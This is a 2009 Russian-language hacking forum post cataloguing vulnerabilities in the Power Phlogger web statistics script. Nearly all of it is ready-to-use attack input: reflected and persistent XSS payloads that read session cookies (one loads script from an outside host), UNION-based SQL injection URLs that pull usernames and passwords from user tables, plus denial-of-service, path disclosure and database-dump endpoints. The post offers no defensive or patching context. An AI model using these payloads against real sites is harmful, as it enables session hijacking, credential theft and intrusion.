[Обзор уязвимостей Power Phlogger]

Discussion in 'Веб-уязвимости' started by OptimaPrime, 4 Jan 2009.

Thread Status:
Not open for further replies.
  1. OptimaPrime

    OptimaPrime Banned

    Joined:
    30 Mar 2007
    Messages:
    310
    Likes Received:
    588
    Reputations:
    -61
    Power Phlogger <= 2.0.9 (config.inc.php3) File Include Vulnerability

    Power Phlogger Rel_Path Remote File Include Vulnerability

    Power Phlogger Login.PHP SQL Injection Vulnerability

    Power Phlogger 'css_str' SQL Injection Vulnerability

    Power Phlogger 2.0.9 Remote|Local File Include Vulnerability

    Power Phlogger v.2.2.5 (username) SQL Injection


    XSS:



    Code:
    http://site/dspLogs.php?S_hostname=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E
    Code:
    http://site/dspLogs.php?S_referer=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E
    Code:
    http://site/dspLogs.php?S_agent=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E
    Code:
    http://site/dspLogs.php?S_res=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E
    Code:
    http://site/edCss.php?css_str=12%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E&action=edit
    Code:
    http://site/dspLogs.php?S_color=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E
    Code:
    http://site/dspLogs.php?S_online=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E
    Code:
    http://site/dspLogs.php?S_mp=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E
    Code:
    http://site/dspStats.php?edit=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E
    Code:
    http://site/dspLogs.php/%22%3E%3Cscript%20src=XSS
    Code:
    http://site/dspStats.php/%22%3E%3Cscript%20src=XSS
    Code:
    http://site/edCss.php/%22%3E%3Cscript%20src=XSS
    Code:
    http://site/edCss.php?action=create+new&fields%5Bcss%5D=%3Cscript%3Ealert(document.cookie)%3C/script%3E





    XSS (Persistent):


    Post запрос на странице http://site/edUserprofile.php


    Code:
    </textarea><script>alert(document.cookie)</script>
    В параметре N_your_url

    Code:
    "><script>alert(document.cookie)</script>
    В параметре N_email

    Code:
    "><script src=http://site.com
    В параметрах N_fg_c, N_bg_c(до 30 символов)


    DoS:


    http://site/include/get_userdata.php

    http://site/newaccount_self.php

    Зацикленные редиректы.


    (c)MustLive​


    SQL иньекции:

    Code:
    http://site/edCss.php?css_str=-1%20union%20select%20null,null,id,username,pw,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null%20from%20pphl_users%20limit%200,1&action=edit
    Code:
    http://site/edit.php?site=-12%20union%20select%200,1,username,password,4,version(),user(),7,8,9,10,11,database(),13,14,15,16,17,18++from+users--
    
    Full path disclosure:


    http://site/include/edCss.inc.php

    http://site/include/foot.inc.php

    http://site/include/get_csscolors.inc.php

    http://site/include/head.inc.php

    http://site/include/head_stuff.inc.php

    http://site/include/loglist.inc.php

    http://site/include/pphlogger_send.inc.php

    http://site/modules/usercreate.php

    http://site/modules/htmlMimeMail.php

    http://site/modules/img_vis_per_hour.mod.php

    http://site/modules/usercreate.php

    http://site/modules/htmlMimeMail.php

    http://site/modules/img_vis_per_hour.mod.php

    http://site/edit_user.php

    http://site/main-dummy.php

    http://site/main.php

    http://site/modules/htmlMimeMail.php

    http://site/modules/img_vis_per_hour.mod.php

    http://site/modules/usercreate.php



    Information disclosure:



    http://site/modules/db_dump.php
    Названия базы данных,струкрура таблиц

    http://site/robots.txt

    http://site/upgrade/extchange.php

    http://site/main_location.inc

    Code:
    <meta name="PHP Version" content="..." />
    <meta name="MYSQL Version" content="..." />
     
    3 people like this.
Loading...
Thread Status:
Not open for further replies.